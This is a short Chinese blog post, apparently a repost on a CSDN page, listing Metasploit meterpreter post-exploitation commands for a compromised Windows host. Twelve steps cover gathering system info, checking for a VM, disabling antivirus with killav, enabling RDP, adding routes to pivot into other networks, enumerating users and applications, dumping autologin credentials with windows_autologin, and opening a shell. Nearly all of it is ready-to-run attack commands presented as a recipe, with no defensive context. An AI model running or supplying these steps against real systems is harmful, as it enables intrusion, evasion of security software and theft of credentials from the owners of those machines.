meterpreter--收集系统信息

一:收集目标机系统信息

sysinfo

二:检查目标机是否运行在虚拟机上

run post/windows/gather/checkvm

三:目标机最近运行时间

idletime

已运行8小时45分钟7秒

 

四:查看目标机渗透成功的用户名

getuid

 

五:关闭安全软件

run post/windows/manage/killav

 

六:开启目标机远程桌面协议(3389)

run post/windows/manage/enable_rdp

 

七:将当前会话转到后台

background

 

八:添加路由(可以借助被攻陷的主机对其它网络攻击)

在meterpreter中需要先background

 

九:查看目标机用户

run post/windows/gather/enum_logged_on_users

 

十:列举目标机应用程序

run post/windows/gather/enum_applications

 

十一:抓取自动登录的用户名和密码

run post/windows/gather/credentials/windows_autologin

 

十二:进入目标机shell

shell

使用exit停止会话并返回meterpreter

 

转载于:https://www.cnblogs.com/cz201803/p/10770450.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值